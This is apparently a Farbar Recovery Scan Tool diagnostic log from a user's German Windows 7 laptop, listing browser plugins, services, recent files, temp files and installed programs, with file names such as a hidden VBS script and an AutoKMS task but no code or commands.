BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - c:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Microsoft-Konto-Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Tcpip\Parameters: [DhcpNameServer] 172.20.10.1
FireFox:
========
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.0.6 - C:\Program Files\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3508.0205 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.23.9\npGoogleUpdate3.dll (Google Inc.)
Chrome:
=======
CHR Plugin: (Shockwave Flash) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\PepperFlash\11.7.700.202\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\33.0.1750.154\pdf.dll ()
CHR Plugin: (Adobe Acrobat) - c:\Program Files (x86)\Adobe\Reader 9.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPAUTHZ.DLL (Microsoft Corporation)
CHR Plugin: (Microsoft Office 2010) - C:\PROGRA~2\MICROS~4\Office14\NPSPWRAP.DLL (Microsoft Corporation)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Extension: (Google Docs) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2013-05-15]
CHR Extension: (Google Drive) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2013-05-15]
CHR Extension: (YouTube) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2013-05-15]
CHR Extension: (Google-Suche) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2013-05-15]
CHR Extension: (Google Wallet) - C:\Users\Franz\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2013-09-10]
==================== Services (Whitelisted) =================
R2 AntiVirSchedulerService; C:\Program Files (x86)\Avira\AntiVir Desktop\sched.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 AntiVirService; C:\Program Files (x86)\Avira\AntiVir Desktop\avguard.exe [440400 2014-02-20] (Avira Operations GmbH & Co. KG)
R2 ePowerSvc; C:\Program Files\Acer\Acer PowerSmart Manager\ePowerSvc.exe [820768 2010-02-02] (Acer Incorporated)
R2 nlsvc; C:\Program Files\NetLimiter 3\nlsvc.exe [1845248 2011-03-21] (Locktime Software)
R2 RS_Service; C:\Program Files (x86)\Acer\Acer VCM\RS_Service.exe [260640 2010-01-29] (Acer Incorporated)
==================== Drivers (Whitelisted) ====================
R2 avgntflt; C:\Windows\System32\DRIVERS\avgntflt.sys [108440 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avipbb; C:\Windows\System32\DRIVERS\avipbb.sys [131576 2013-12-22] (Avira Operations GmbH & Co. KG)
R1 avkmgr; C:\Windows\System32\DRIVERS\avkmgr.sys [28600 2013-12-15] (Avira Operations GmbH & Co. KG)
R1 nltdi; C:\Program Files\NetLimiter 3\nltdi.sys [88200 2011-03-21] (Locktime Software)
==================== NetSvcs (Whitelisted) ===================
==================== One Month Created Files and Folders ========
2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:40 - 2014-04-14 10:42 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-11 05:39 - 2014-03-04 14:07 - 142602520 _____ (Microsoft Corporation) C:\Users\Franz\Desktop\wlsetup-all_16.4.3508.0205.exe
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:26 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\Desktop\wtbchkxbde..txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-07 09:32 - 2014-04-09 10:19 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-03 10:10 - 2014-04-12 01:15 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-02 08:42 - 2014-04-07 09:25 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:19 - 2014-04-02 08:54 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 06:29 - 2013-02-01 10:07 - 557660892 _____ () C:\Users\Franz\Desktop\Bavaria Traumreise durch Bayern.mkv
2014-04-02 06:15 - 2013-03-03 06:17 - 3702646581 _____ () C:\Users\Franz\Desktop\Das grüne Wunder - Unser Wald.mkv
2014-04-01 04:51 - 2013-09-22 17:47 - 00073266 ___SH () C:\Users\Franz\AppData\Roaming\wtbchkxbde..vbs
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-21 07:44 - 2014-03-24 01:36 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
==================== One Month Modified Files and Folders =======
2014-04-14 10:43 - 2014-04-14 10:43 - 00017845 _____ () C:\Users\Franz\Desktop\FRST.txt
2014-04-14 10:43 - 2014-04-14 10:43 - 00000000 ____D () C:\FRST
2014-04-14 10:43 - 2013-04-16 19:13 - 01518797 _____ () C:\Windows\WindowsUpdate.log
2014-04-14 10:42 - 2014-04-14 10:40 - 02157568 _____ (Farbar) C:\Users\Franz\Desktop\FRST64.exe
2014-04-14 10:29 - 2013-04-16 20:09 - 00001104 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2014-04-14 10:28 - 2013-04-16 20:09 - 00001108 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:28 - 2009-07-14 06:45 - 00022672 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2014-04-14 10:20 - 2013-04-16 21:29 - 00000000 ____D () C:\Setups
2014-04-14 10:17 - 2013-04-16 20:29 - 00000043 _____ () C:\Users\Public\Documents\AtherosServiceConfig.ini
2014-04-14 10:17 - 2009-07-14 06:51 - 00087045 _____ () C:\Windows\setupact.log
2014-04-14 10:16 - 2013-04-16 22:17 - 00000266 _____ () C:\Windows\Tasks\AutoKMS.job
2014-04-14 10:16 - 2009-07-14 07:08 - 00000006 ____H () C:\Windows\Tasks\SA.DAT
2014-04-14 02:10 - 2013-04-16 20:22 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\vlc
2014-04-12 01:15 - 2014-04-03 10:10 - 00000000 ____D () C:\Users\Franz\Desktop\FPCD
2014-04-12 00:15 - 2013-04-17 05:01 - 00696870 _____ () C:\Windows\system32\perfh007.dat
2014-04-12 00:15 - 2013-04-17 05:01 - 00148134 _____ () C:\Windows\system32\perfc007.dat
2014-04-12 00:15 - 2009-07-14 07:13 - 01612484 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-04-09 11:28 - 2013-04-16 19:54 - 00000000 ___RD () C:\Users\Franz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2014-04-09 11:27 - 2014-04-09 11:27 - 00000076 _____ () C:\Users\Franz\Desktop\Neues Textdokument.txt
2014-04-09 11:25 - 2014-04-09 11:25 - 00023940 _____ () C:\Users\Franz\Desktop\smadav.log
2014-04-09 10:19 - 2014-04-07 09:32 - 00000000 __SHD () C:\[Smad-Cage]
2014-04-07 09:30 - 2014-04-07 09:30 - 00000000 ____D () C:\ProgramData\Kaspersky Lab Setup Files
2014-04-07 09:25 - 2014-04-02 08:42 - 00000000 ____D () C:\Users\Franz\Desktop\Antivir
2014-04-06 08:23 - 2013-04-16 20:09 - 00004104 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2014-04-06 08:23 - 2013-04-16 20:09 - 00003852 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2014-04-02 08:54 - 2014-04-02 08:19 - 00000000 ____D () C:\Users\Franz\AppData\Local\NPE
2014-04-02 08:27 - 2014-04-02 08:27 - 00000000 ____D () C:\Windows\pss
2014-04-02 08:25 - 2013-04-16 20:39 - 00000000 ___RD () C:\Users\Franz\Desktop\Dropbox
2014-04-02 08:24 - 2013-04-16 20:35 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\Dropbox
2014-04-02 08:19 - 2014-04-02 08:19 - 00000000 ____D () C:\ProgramData\Norton
2014-04-02 08:03 - 2013-04-16 20:10 - 00002179 _____ () C:\Users\Public\Desktop\Google Chrome.lnk
2014-03-31 04:12 - 2014-02-28 13:54 - 00000000 ____D () C:\Users\Franz\Desktop\Fotos
2014-03-27 00:58 - 2013-10-03 22:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\uTorrent
2014-03-25 09:41 - 2014-03-25 09:41 - 00003416 ____N () C:\bootsqm.dat
2014-03-25 09:40 - 2014-03-25 09:40 - 00000000 __SHD () C:\found.001
2014-03-24 01:36 - 2014-03-21 07:44 - 00000000 ____D () C:\Users\Franz\AppData\Local\Microsoft Games
2014-03-23 13:40 - 2014-02-28 13:57 - 00000000 ____D () C:\Users\Franz\AppData\Roaming\iFunbox_UserCache
2014-03-19 13:05 - 2014-03-19 13:05 - 00000000 ____D () C:\Users\Franz\Desktop\Neu
Some content of TEMP:
====================
C:\Users\Franz\AppData\Local\Temp\AskSLib.dll
C:\Users\Franz\AppData\Local\Temp\avgnt.exe
C:\Users\Franz\AppData\Local\Temp\CNFNOT32.EXE_0004.exe
C:\Users\Franz\AppData\Local\Temp\DW20.EXE_0001.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x64.exe
C:\Users\Franz\AppData\Local\Temp\MSOHTMED.EXE.x86.exe
C:\Users\Franz\AppData\Local\Temp\ONELEV.EXE_1031.exe
C:\Users\Franz\AppData\Local\Temp\Quarantine.exe
C:\Users\Franz\AppData\Local\Temp\SCANPST.EXE_0002.exe
C:\Users\Franz\AppData\Local\Temp\VSTOInstaller_exe_x86.3643236F_FC70_11D3_A536_0090278A1BB8.41B86362_9D8B_4D9B_B426_8A6D1F809A25.exe
C:\Users\Franz\AppData\Local\Temp\{AADC5B76-0A49-47B1-96B7-3174A4380421}-34.0.1847.116_33.0.1750.154_chrome_updater.exe
==================== Bamital & volsnap Check =================
C:\Windows\System32\winlogon.exe => MD5 is legit
C:\Windows\System32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\System32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\System32\services.exe => MD5 is legit
C:\Windows\System32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\System32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\System32\rpcss.dll => MD5 is legit
C:\Windows\System32\Drivers\volsnap.sys => MD5 is legit
LastRegBack: 2014-03-24 00:49
==================== End Of Log ============================
--- --- --- Addition.txt: Code:
ATTFilter Additional scan result of Farbar Recovery Scan Tool (x64) Version: 13-04-2014 01
Ran by Franz at 2014-04-14 10:44:16
Running from C:\Users\Franz\Desktop
Boot Mode: Normal
==========================================================
==================== Security Center ========================
AV: Avira Desktop (Enabled - Out of date) {4D041356-F94D-285F-8768-AAE50FA36859}
AS: Avira Desktop (Enabled - Out of date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
µTorrent (HKCU\...\uTorrent) (Version: 3.3.2.30488 - BitTorrent Inc.)
Acer Backup Manager (HKLM-x32\...\InstallShield_{72B776E5-4530-4C4B-9453-751DF87D9D93}) (Version: 2.0.0.60 - NewTech Infosystems)
Acer Crystal Eye webcam (HKLM-x32\...\{51F026FA-5146-4232-A8BA-1364740BD053}) (Version: 1.0.3.5 - Liteon)
Acer eRecovery Management (HKLM-x32\...\{7F811A54-5A09-4579-90E1-C93498E230D9}) (Version: 4.05.3011 - Acer Incorporated)
Acer PowerSmart Manager (HKLM-x32\...\{3DB0448D-AD82-4923-B305-D001E521A964}) (Version: 5.02.3001 - Acer Incorporated)
Acer Updater (HKLM-x32\...\{EE171732-BEB4-4576-887D-CB62727F01CA}) (Version: 1.02.3001 - Acer Incorporated)
Acer VCM (HKLM-x32\...\{047F790A-7A2A-4B6A-AD02-38092BA63DAC}) (Version: 4.05.3002 - Acer Incorporated)
Acrobat.com (HKLM-x32\...\{287ECFA4-719A-2143-A09B-D6A12DE54E40}) (Version: 1.6.65 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 1.5.0.7220 - Adobe Systems Inc.)
Adobe AIR (x32 Version: 1.5.0.7220 - Adobe Systems Inc.) Hidden
Adobe Flash Player 10 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 10.0.45.2 - Adobe Systems Incorporated)
Adobe Reader 9.1 MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-A91000000001}) (Version: 9.1.0 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader (HKLM-x32\...\InstallShield_{6030FCD7-8F1A-427D-AF05-8DD1A2EA2ABA}) (Version: 1.5.17.05094 - Alcor Micro Corp.)
Alcor Micro USB Card Reader (x32 Version: 1.5.17.05094 - Alcor Micro Corp.) Hidden
ALPS Touch Pad Driver (HKLM\...\{9F72EF8B-AEC9-4CA5-B483-143980AFD6FD}) (Version: 7.105.2015.1110 - Alps Electric)
Apple Application Support (HKLM-x32\...\{AAC5D43E-816D-4C2D-8E51-55FFF35BE301}) (Version: 3.0.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{787136D2-F0F8-4625-AA3F-72D7795AC842}) (Version: 7.1.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Atheros Communications Inc.(R) AR81Family Gigabit/Fast Ethernet Driver (HKLM-x32\...\{3108C217-BE83-42E4-AE9E-A56A2A92E549}) (Version: 1.0.0.20 - Atheros Communications Inc.)
ATI Catalyst Install Manager (HKLM\...\{F5816A09-786E-C91D-3D99-8A8C92648750}) (Version: 3.0.765.0 - ATI Technologies, Inc.)
Avira Free Antivirus (HKLM-x32\...\Avira AntiVir Desktop) (Version: 14.0.3.350 - Avira)
Backup Manager Basic (x32 Version: 2.0.0.60 - NewTech Infosystems) Hidden
Bluetooth Win7 Suite (64) (HKLM\...\{230D1595-57DA-4933-8C4E-375797EBB7E1}) (Version: 7.01.000.18 - Atheros Communications)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Catalyst Control Center - Branding (x32 Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Full New (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Light (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2010.0421.657.10561 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2010.0421.657.10561 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2010.0421.657.10561 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Czech (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Danish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Dutch (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help English (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Finnish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help French (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help German (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Greek (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Italian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Japanese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Korean (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Polish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Russian (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Spanish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Swedish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Thai (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
CCC Help Turkish (x32 Version: 2010.0421.0656.10561 - ATI) Hidden
ccc-core-static (x32 Version: 2010.0421.657.10561 - Ihr Firmenname) Hidden
ccc-utility64 (Version: 2010.0421.657.10561 - ATI) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{DC4BC0CC-A928-4C48-BA40-AC24784F46E5}) (Version: - Microsoft)
Dropbox (HKCU\...\Dropbox) (Version: 2.4.11 - Dropbox, Inc.)
Fotogalerie (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 33.0.1750.154 - Google Inc.)
Google Update Helper (x32 Version: 1.3.23.9 - Google Inc.) Hidden
HP Officejet 4620 series - Grundlegende Software für das Gerät (HKLM\...\{B16F9E6E-1388-472C-98C3-F32D397EF85D}) (Version: 28.0.1315.0 - Hewlett-Packard Co.)
HP Update (HKLM-x32\...\{6F1C00D2-25C2-4CBA-8126-AE9A6E2E9CD5}) (Version: 5.003.003.001 - Hewlett-Packard)
I.R.I.S. OCR (HKLM-x32\...\{CA6BCA2F-EDEB-408F-850B-31404BE16A61}) (Version: 12.3.4.0 - HP)
Identity Card (HKLM-x32\...\Identity Card) (Version: 1.00.3003 - Acer Incorporated)
iFunbox (v2.7.2386.747), iFunbox DevTeam (HKLM-x32\...\iFunbox_is1) (Version: v2.7.2386.747 - )
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 6.0.0.1179 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM-x32\...\{3E29EE6C-963A-4aae-86C1-DC237C4A49FC}) (Version: 9.6.0.1014 - Intel Corporation)
iTunes (HKLM\...\{B8BA155B-1E75-405F-9CB4-8A99615D09DC}) (Version: 11.1.5.5 - Apple Inc.)
JDownloader 0.9 (HKLM-x32\...\5513-1208-7298-9440) (Version: 0.9 - AppWork GmbH)
Launch Manager (HKLM-x32\...\LManager) (Version: 4.0.10 - Acer Inc.)
Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Client Profile DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation)
Microsoft .NET Framework 4 Extended DEU Language Pack (Version: 4.0.30319 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office Access MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Office 32-bit Components 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Professional Plus 2010 (HKLM\...\Office14.PROPLUS) (Version: 14.0.7015.1000 - Microsoft Corporation)
Microsoft Office Professional Plus 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Italian) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Publisher MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared 32-bit MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (German) 2010 (Version: 14.0.7015.1000 - Microsoft Corporation) Hidden
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
MozBackup 1.5.1 (HKLM-x32\...\MozBackup) (Version: - Pavel Cvrcek)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 24.3.0 - Mozilla)
Mozilla Thunderbird 24.3.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.3.0 (x86 de)) (Version: 24.3.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT110 (x32 Version: 16.4.1108.0727 - Microsoft) Hidden
MSVCRT110_amd64 (Version: 16.4.1109.0912 - Microsoft) Hidden
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NetLimiter 3 (HKLM\...\{913923AB-3AAB-4870-8910-627C4CD82789}) (Version: 3.0.0.11 - Locktime Software s.r.o.)
Photo Common (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
Photo Gallery (x32 Version: 16.4.3508.0205 - Microsoft Corporation) Hidden
PX Profile Update (x32 Version: 1.00.1. - AMD) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6029 - Realtek Semiconductor Corp.)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (HKLM\...\{90140000-0011-0000-1000-0000000FF1CE}_Office14.PROPLUS_{A3364707-2F53-4C83-8F68-C9877A9080C7}) (Version: - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 64-Bit Edition (Version: - Microsoft) Hidden
Skype™ 6.14 (HKLM-x32\...\{7A3C7E05-EE37-47D6-99E1-2EB05A3DA3F7}) (Version: 6.14.104 - Skype Technologies S.A.)
TeraCopy 2.27 (HKLM\...\TeraCopy_is1) (Version: - Code Sector)
Update for Microsoft .NET Framework 4 Client Profile (KB2468871) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2468871) (Version: 1 - Microsoft Corporation)
Update for Microsoft .NET Framework 4 Client Profile (KB2533523) (HKLM-x32\...\{F5B09CFD-F0B2-36AF-8DF4-1DF6B63FC7B4}.KB2533523) (Version: 1 - Microsoft Corporation)
